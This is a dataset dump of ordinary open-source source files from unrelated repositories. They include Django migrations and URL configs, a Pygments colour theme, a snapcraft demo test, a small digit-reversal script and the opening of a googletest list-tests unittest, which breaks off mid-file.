| repo_name (string, 5-100 chars) | ref (string, 12-67 chars) | path (string, 4-244 chars) | copies (string, 1-8 chars) | content (string, 0-1.05M chars, may be null ⌀) |
|---|---|---|---|---|
jocave/snapcraft
|
refs/heads/master
|
snaps_tests/demos_tests/test_java_hello_world.py
|
9
|
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015, 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import snaps_tests
class JavaHelloWorldTestCase(snaps_tests.SnapsTestCase):

    snap_content_dir = 'java-hello-world'

    def test_java_hello_world(self):
        snap_path = self.build_snap(self.snap_content_dir)
        self.install_snap(snap_path, 'java-hello-world', '0')
        self.assert_command_in_snappy_testbed(
            '/snap/bin/java-hello-world.hello', 'Hello World\n')
|
Havate/havate-openstack
|
refs/heads/master
|
proto-build/gui/config/urls.py
|
1
|
from django.conf.urls import patterns, include, url
from config.views import HomePageView, SettingsView, NodeDiscoveryView, ScenarioDiscoveryView, SubmitSettingsView, SettingsTextView
urlpatterns = patterns('',
# url(r'^$', 'app_name.views.home', name='home'),
# url(r'^openstack_installer/', include('openstack_installer.foo.urls')),
url(r'^$', SettingsView.as_view(), name='home'),
url(r'^settings/$', SettingsView.as_view(), name='settings'),
url(r'^submit_settings/$', SubmitSettingsView.as_view(), name='submit_settings'),
url(r'^settings_text_view/$', SettingsTextView.as_view(), name='settings_text_view'),
url(r'^node_discovery/$', NodeDiscoveryView.as_view(), name='node_discovery'),
url(r'^scenario_discovery/$', ScenarioDiscoveryView.as_view(), name='scenario_discovery'),
)
|
lizardsystem/lizard-workspace
|
refs/heads/master
|
lizard_workspace/migrations/0016_auto__add_field_wmsserver_is_local_server.py
|
1
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'WmsServer.is_local_server'
db.add_column('lizard_workspace_wmsserver', 'is_local_server', self.gf('django.db.models.fields.BooleanField')(default=False), keep_default=False)
def backwards(self, orm):
# Deleting field 'WmsServer.is_local_server'
db.delete_column('lizard_workspace_wmsserver', 'is_local_server')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'lizard_map.backgroundmap': {
'Meta': {'ordering': "('index',)", 'object_name': 'BackgroundMap'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'google_type': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'default': '100'}),
'is_base_layer': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'layer_names': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'layer_type': ('django.db.models.fields.IntegerField', [], {}),
'layer_url': ('django.db.models.fields.CharField', [], {'default': "'http://tile.openstreetmap.nl/tiles/${z}/${x}/${y}.png'", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'lizard_map.workspacestorage': {
'Meta': {'object_name': 'WorkspaceStorage'},
'absolute': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'background_map': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_map.BackgroundMap']", 'null': 'True', 'blank': 'True'}),
'custom_time': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'dt': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'dt_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'dt_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'td': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'td_end': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'td_start': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'x_max': ('django.db.models.fields.FloatField', [], {'default': '1254790'}),
'x_min': ('django.db.models.fields.FloatField', [], {'default': '-14675'}),
'y_max': ('django.db.models.fields.FloatField', [], {'default': '6964942'}),
'y_min': ('django.db.models.fields.FloatField', [], {'default': '6668977'})
},
'lizard_security.dataset': {
'Meta': {'ordering': "['name']", 'object_name': 'DataSet'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'})
},
'lizard_workspace.app': {
'Meta': {'object_name': 'App'},
'action_params': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'blank': 'True'}),
'action_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'appscreen': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+'", 'null': 'True', 'to': "orm['lizard_workspace.AppScreen']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'icon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.AppIcons']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mouse_over': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '256', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'root_map': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.LayerFolder']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'lizard_workspace.appicons': {
'Meta': {'object_name': 'AppIcons'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'lizard_workspace.appscreen': {
'Meta': {'object_name': 'AppScreen'},
'apps': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'screen'", 'symmetrical': 'False', 'through': "orm['lizard_workspace.AppScreenAppItems']", 'to': "orm['lizard_workspace.App']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'lizard_workspace.appscreenappitems': {
'Meta': {'object_name': 'AppScreenAppItems'},
'app': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.App']"}),
'appscreen': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.AppScreen']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'default': '100'})
},
'lizard_workspace.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'lizard_workspace.layer': {
'Meta': {'object_name': 'Layer'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.Category']", 'null': 'True', 'blank': 'True'}),
'data_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataSet']", 'null': 'True', 'blank': 'True'}),
'filter': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_base_layer': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_clickable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_local_server': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'layers': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'location_filter': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'ollayer_class': ('django.db.models.fields.CharField', [], {'default': "'OpenLayers.Layer.WMS'", 'max_length': '80'}),
'options': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'owner_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'request_params': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'server': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.WmsServer']", 'null': 'True', 'blank': 'True'}),
'single_tile': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200', 'db_index': 'True'}),
'source_ident': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['lizard_workspace.Tag']", 'null': 'True', 'blank': 'True'}),
'use_location_filter': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'lizard_workspace.layerfolder': {
'Meta': {'object_name': 'LayerFolder'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'layer_tag': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['lizard_workspace.Tag']", 'null': 'True', 'blank': 'True'}),
'layers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['lizard_workspace.Layer']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children_set'", 'null': 'True', 'to': "orm['lizard_workspace.LayerFolder']"})
},
'lizard_workspace.layerworkspace': {
'Meta': {'ordering': "['name']", 'object_name': 'LayerWorkspace', '_ormbases': ['lizard_map.WorkspaceStorage']},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.Category']", 'null': 'True', 'blank': 'True'}),
'data_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataSet']", 'null': 'True', 'blank': 'True'}),
'layers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['lizard_workspace.Layer']", 'null': 'True', 'through': "orm['lizard_workspace.LayerWorkspaceItem']", 'blank': 'True'}),
'owner_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'personal_category': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
'workspacestorage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['lizard_map.WorkspaceStorage']", 'unique': 'True', 'primary_key': 'True'})
},
'lizard_workspace.layerworkspaceitem': {
'Meta': {'object_name': 'LayerWorkspaceItem'},
'clickable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'filter_string': ('django.db.models.fields.CharField', [], {'max_length': '124', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'default': '100'}),
'layer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.Layer']"}),
'layer_workspace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.LayerWorkspace']"}),
'opacity': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'lizard_workspace.synctask': {
'Meta': {'object_name': 'SyncTask'},
'data_set': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_security.DataSet']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_result': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'server': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.WmsServer']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_workspace.Tag']", 'null': 'True', 'blank': 'True'})
},
'lizard_workspace.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'lizard_workspace.thematicmap': {
'Meta': {'object_name': 'ThematicMap'},
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'lizard_workspace.wmsserver': {
'Meta': {'object_name': 'WmsServer'},
'abstract': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_local_server': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '256', 'blank': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['lizard_workspace']
|
danalec/dotfiles
|
refs/heads/master
|
sublime/.config/sublime-text-3/Packages/pygments/all/pygments/styles/native.py
|
50
|
# -*- coding: utf-8 -*-
"""
pygments.styles.native
~~~~~~~~~~~~~~~~~~~~~~
pygments version of my "native" vim theme.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Token, Whitespace
class NativeStyle(Style):
"""
Pygments version of the "native" vim theme.
"""
background_color = '#202020'
highlight_color = '#404040'
styles = {
Token: '#d0d0d0',
Whitespace: '#666666',
Comment: 'italic #999999',
Comment.Preproc: 'noitalic bold #cd2828',
Comment.Special: 'noitalic bold #e50808 bg:#520000',
Keyword: 'bold #6ab825',
Keyword.Pseudo: 'nobold',
Operator.Word: 'bold #6ab825',
String: '#ed9d13',
String.Other: '#ffa500',
Number: '#3677a9',
Name.Builtin: '#24909d',
Name.Variable: '#40ffff',
Name.Constant: '#40ffff',
Name.Class: 'underline #447fcf',
Name.Function: '#447fcf',
Name.Namespace: 'underline #447fcf',
Name.Exception: '#bbbbbb',
Name.Tag: 'bold #6ab825',
Name.Attribute: '#bbbbbb',
Name.Decorator: '#ffa500',
Generic.Heading: 'bold #ffffff',
Generic.Subheading: 'underline #ffffff',
Generic.Deleted: '#d22323',
Generic.Inserted: '#589819',
Generic.Error: '#d22323',
Generic.Emph: 'italic',
Generic.Strong: 'bold',
Generic.Prompt: '#aaaaaa',
Generic.Output: '#cccccc',
Generic.Traceback: '#d22323',
Error: 'bg:#e3d2d2 #a61717'
}
|
SANDEISON/The-Huxley
|
refs/heads/master
|
Python/Invertido.py
|
3
|
num2 = int(input())
invert = 0
while num2 > 0:
    invert *= 10
    invert += num2 % 10
    num2 //= 10
print(invert)
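# Worked trace of the loop above for input 123 (example values, not from the
# original file):
#   iteration 1: invert = 0 * 10 + 3 = 3;    num2 = 12
#   iteration 2: invert = 3 * 10 + 2 = 32;   num2 = 1
#   iteration 3: invert = 32 * 10 + 1 = 321; num2 = 0
# so the program prints the decimal digits of the input in reverse order: 321.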
|
warriorYosemite/colorBrick
|
refs/heads/master
|
cocos2d/plugin/tools/toolsForGame/modifyProject.py
|
255
|
import sys, string, os
from xml.etree import ElementTree as ET
from xml.dom import minidom
projFile = sys.argv[1]
targetPath = sys.argv[2]
def getLinkElement():
global targetPath
ret = ET.Element('link')
nameEle = ET.Element('name')
nameEle.text = 'plugin-x'
typeEle = ET.Element('type')
typeEle.text = '2'
locEle = ET.Element('locationURI')
locEle.text = targetPath
ret.append(nameEle)
ret.append(typeEle)
ret.append(locEle)
return ret
tree = ET.parse(projFile)
root = tree.getroot()
nodeLinkRes = root.find('linkedResources')
if nodeLinkRes != None:
linkNodes = nodeLinkRes.findall('link')
haveTarget = False
if linkNodes != None and len(linkNodes) > 0:
for node in linkNodes:
locNode = node.find('locationURI')
if locNode == None:
continue
tempText = locNode.text
tempText = tempText.strip(' \n\r\t')
if tempText == targetPath:
haveTarget = True
break
if not haveTarget:
nodeLinkRes.append(getLinkElement())
tree.write(projFile, 'UTF-8')
else:
linkResEle = ET.Element('linkedResources')
linkResEle.append(getLinkElement())
root.append(linkResEle)
tree.write(projFile, 'UTF-8')
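# For reference (structure inferred from the code above, not from the repo's
# docs): getLinkElement() produces a <link> element of the form
#   <link>
#     <name>plugin-x</name>
#     <type>2</type>
#     <locationURI>...target path from sys.argv[2]...</locationURI>
#   </link>
# which the script appends under <linkedResources> only when no existing link
# already points at the same locationURI.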
|
lsqtongxin/django
|
refs/heads/master
|
django/contrib/gis/utils/srs.py
|
450
|
from django.contrib.gis.gdal import SpatialReference
from django.db import DEFAULT_DB_ALIAS, connections
def add_srs_entry(srs, auth_name='EPSG', auth_srid=None, ref_sys_name=None,
database=None):
"""
This function takes a GDAL SpatialReference system and adds its information
to the `spatial_ref_sys` table of the spatial backend. Doing this enables
database-level spatial transformations for the backend. Thus, this utility
is useful for adding spatial reference systems not included by default with
the backend:
>>> from django.contrib.gis.utils import add_srs_entry
>>> add_srs_entry(3857)
Keyword Arguments:
auth_name:
This keyword may be customized with the value of the `auth_name` field.
Defaults to 'EPSG'.
auth_srid:
This keyword may be customized with the value of the `auth_srid` field.
Defaults to the SRID determined by GDAL.
ref_sys_name:
For SpatiaLite users only, sets the value of the `ref_sys_name` field.
Defaults to the name determined by GDAL.
database:
The name of the database connection to use; the default is the value
of `django.db.DEFAULT_DB_ALIAS` (at the time of this writing, its value
is 'default').
"""
if not database:
database = DEFAULT_DB_ALIAS
connection = connections[database]
if not hasattr(connection.ops, 'spatial_version'):
raise Exception('The `add_srs_entry` utility only works '
'with spatial backends.')
if not connection.features.supports_add_srs_entry:
raise Exception('This utility does not support your database backend.')
SpatialRefSys = connection.ops.spatial_ref_sys()
# If argument is not a `SpatialReference` instance, use it as parameter
# to construct a `SpatialReference` instance.
if not isinstance(srs, SpatialReference):
srs = SpatialReference(srs)
if srs.srid is None:
raise Exception('Spatial reference requires an SRID to be '
'compatible with the spatial backend.')
# Initializing the keyword arguments dictionary for both PostGIS
# and SpatiaLite.
kwargs = {'srid': srs.srid,
'auth_name': auth_name,
'auth_srid': auth_srid or srs.srid,
'proj4text': srs.proj4,
}
# Backend-specific fields for the SpatialRefSys model.
srs_field_names = {f.name for f in SpatialRefSys._meta.get_fields()}
if 'srtext' in srs_field_names:
kwargs['srtext'] = srs.wkt
if 'ref_sys_name' in srs_field_names:
# Spatialite specific
kwargs['ref_sys_name'] = ref_sys_name or srs.name
# Creating the spatial_ref_sys model.
try:
# Try getting via SRID only, because using all kwargs may
# differ from exact wkt/proj in database.
SpatialRefSys.objects.using(database).get(srid=srs.srid)
except SpatialRefSys.DoesNotExist:
SpatialRefSys.objects.using(database).create(**kwargs)
# Alias is for backwards-compatibility purposes.
add_postgis_srs = add_srs_entry
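# A minimal usage sketch (my assumption of a typical call, not from this
# module): register WGS84 in the spatial backend behind the default alias.
#   from django.contrib.gis.gdal import SpatialReference
#   add_srs_entry(SpatialReference(4326))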
|
healthchecks/healthchecks
|
refs/heads/master
|
hc/accounts/migrations/0032_auto_20200819_0757.py
|
2
|
# Generated by Django 3.1 on 2020-08-19 07:57
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ('accounts', '0031_auto_20200803_1413'),
    ]

    operations = [
        migrations.AddConstraint(
            model_name='member',
            constraint=models.UniqueConstraint(fields=('user', 'project'), name='accounts_member_no_duplicates'),
        ),
    ]
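# On PostgreSQL this constraint corresponds roughly to (sketch only, the exact
# SQL is backend-dependent):
#   ALTER TABLE accounts_member
#       ADD CONSTRAINT accounts_member_no_duplicates UNIQUE (user_id, project_id);
# i.e. a given user can belong to a given project at most once.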
|
gasman/shortcrust
|
refs/heads/master
|
setup.py
|
2
|
from distutils.core import setup
setup(
name='Shortcrust',
version='0.1dev',
packages=['shortcrust',],
license='MIT',
long_description=open('README.txt').read(),
)
|
clarkperkins/readthedocs.org
|
refs/heads/master
|
readthedocs/projects/migrations/0002_add_importedfile_model.py
|
36
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):

    dependencies = [
        ('builds', '0001_initial'),
        ('projects', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='ImportedFile',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=255, verbose_name='Name')),
                ('slug', models.SlugField(verbose_name='Slug')),
                ('path', models.CharField(max_length=255, verbose_name='Path')),
                ('md5', models.CharField(max_length=255, verbose_name='MD5 checksum')),
                ('commit', models.CharField(max_length=255, verbose_name='Commit')),
                ('project', models.ForeignKey(related_name='imported_files', verbose_name='Project', to='projects.Project')),
                ('version', models.ForeignKey(related_name='imported_files', verbose_name='Version', to='builds.Version', null=True)),
            ],
        ),
    ]
|
XiaodunServerGroup/ddyedx
|
refs/heads/master
|
common/djangoapps/edxmako/template.py
|
30
|
# Copyright (c) 2008 Mikeal Rogers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf import settings
from mako.template import Template as MakoTemplate
from edxmako.shortcuts import marketing_link
import edxmako
import edxmako.middleware
DJANGO_VARIABLES = ['output_encoding', 'encoding_errors']
# TODO: We should make this a Django Template subclass that simply has the MakoTemplate inside of it? (Instead of inheriting from MakoTemplate)
class Template(MakoTemplate):
"""
This bridges the gap between a Mako template and a Django template. It can
be rendered like it is a django template because the arguments are transformed
in a way that MakoTemplate can understand.
"""
def __init__(self, *args, **kwargs):
"""Overrides base __init__ to provide django variable overrides"""
if not kwargs.get('no_django', False):
overrides = {k: getattr(edxmako, k, None) for k in DJANGO_VARIABLES}
overrides['lookup'] = edxmako.LOOKUP['main']
kwargs.update(overrides)
super(Template, self).__init__(*args, **kwargs)
def render(self, context_instance):
"""
This takes a render call with a context (from Django) and translates
it to a render call on the mako template.
"""
# collapse context_instance to a single dictionary for mako
context_dictionary = {}
# In various testing contexts, there might not be a current request context.
if edxmako.middleware.requestcontext is not None:
for d in edxmako.middleware.requestcontext:
context_dictionary.update(d)
for d in context_instance:
context_dictionary.update(d)
context_dictionary['settings'] = settings
context_dictionary['EDX_ROOT_URL'] = settings.EDX_ROOT_URL
context_dictionary['django_context'] = context_instance
context_dictionary['marketing_link'] = marketing_link
return super(Template, self).render_unicode(**context_dictionary)
|
jamespcole/home-assistant
|
refs/heads/master
|
homeassistant/components/nx584/__init__.py
|
36
|
"""Support for NX584 alarm control panels."""
|
joydeeps/googletest
|
refs/heads/master
|
test/gtest_list_tests_unittest.py
|
1898
|
#!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test's --gtest_list_tests flag.
A user can ask Google Test to list all tests by specifying the
--gtest_list_tests flag. This script tests such functionality
by invoking gtest_list_tests_unittest_ (a program written with
Google Test) with the command line flags.
"""
__author__ = 'phanna@google.com (Patrick Hanna)'
import gtest_test_utils
import re
# Constants.
# The command line flag for enabling/disabling listing all tests.
LIST_TESTS_FLAG = 'gtest_list_tests'
# Path to the gtest_list_tests_unittest_ program.
EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_')
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests
EXPECTED_OUTPUT_NO_FILTER_RE = re.compile(r"""FooDeathTest\.
Test1
Foo\.
Bar1
Bar2
DISABLED_Bar3
Abc\.
Xyz
Def
FooBar\.
Baz
FooTest\.
Test1
DISABLED_Test2
Test3
TypedTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
TypedTest/1\. # TypeParam = int\s*\*
TestA
TestB
TypedTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
My/TypeParamTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\.
TestA
TestB
My/TypeParamTest/1\. # TypeParam = int\s*\*
TestA
TestB
My/TypeParamTest/2\. # TypeParam = .*MyArray<bool,\s*42>
TestA
TestB
MyInstantiation/ValueParamTest\.
TestA/0 # GetParam\(\) = one line
